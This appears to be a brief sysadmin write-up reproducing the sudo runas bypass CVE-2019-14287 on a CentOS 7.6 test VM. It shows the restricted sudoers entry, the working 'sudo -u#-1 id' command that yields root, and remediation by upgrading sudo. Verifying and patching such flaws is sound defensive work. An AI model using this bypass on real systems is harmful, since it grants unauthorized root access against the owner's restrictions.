Sudo Flaw Permits Restricted Root Runas Access

Contents

Sudo Flaw Permits Restricted Root Runas Access.  sudo configured to allow a user run commands as another user with the ALL keyword using the runas command specifying the user ID -1 or 4294967295 can run commands as root even when explicitly disallowed.  The PAM session will not run for the command.  This vulnerability is assigned as CVE-2019-14287 and affects sudo versions prior to 1.8.28.  There are a couple of examples that may be found; however, wanted to see this in action on a CentOS 7.6 with sudo-1.8.23-3.el7.x86_64 (1.8.23).

The Setup

Create a user user1 and add user to sudoers restricting access  to the id command as root user.

/etc/sudoers.d/user1.conf

user1 ALL=(ALL, !root) /usr/bin/id

sudo Tests

sudo as user1 and run the commands.

[user1@centos7 root]$ sudo id
Sorry, user user1 is not allowed to execute '/bin/id' as root on centos7.example.com.

[user1@centos7 root]$ sudo -u#0 id
Sorry, user user1 is not allowed to execute '/bin/id' as root on centos7.example.com.

[user1@centos7 root]$ sudo -u#-1 id
uid=0(root) gid=1017(user1) groups=1017(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user1@centos7 root]$ sudo -u#-1 id -u
0

Resolution

Update sudo to 1.8.28.  There is no RPM at the time of this writing.  The latest version falls well short of 1.8.28. Alternately, build from source. Not completely tested and create a snapshot of the VM prior to completing this task.

wget ftp://ftp.sudo.ws/pub/sudo/sudo-1.8.28.tar.gz
tar xzvf sudo-1.8.28.tar.gz
cd sudo-1.8.28
./configure
make
make install

Source(s)

  • https://www.sudo.ws/alerts/minus_1_uid.html
  • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
  • https://www.sudo.ws/install.html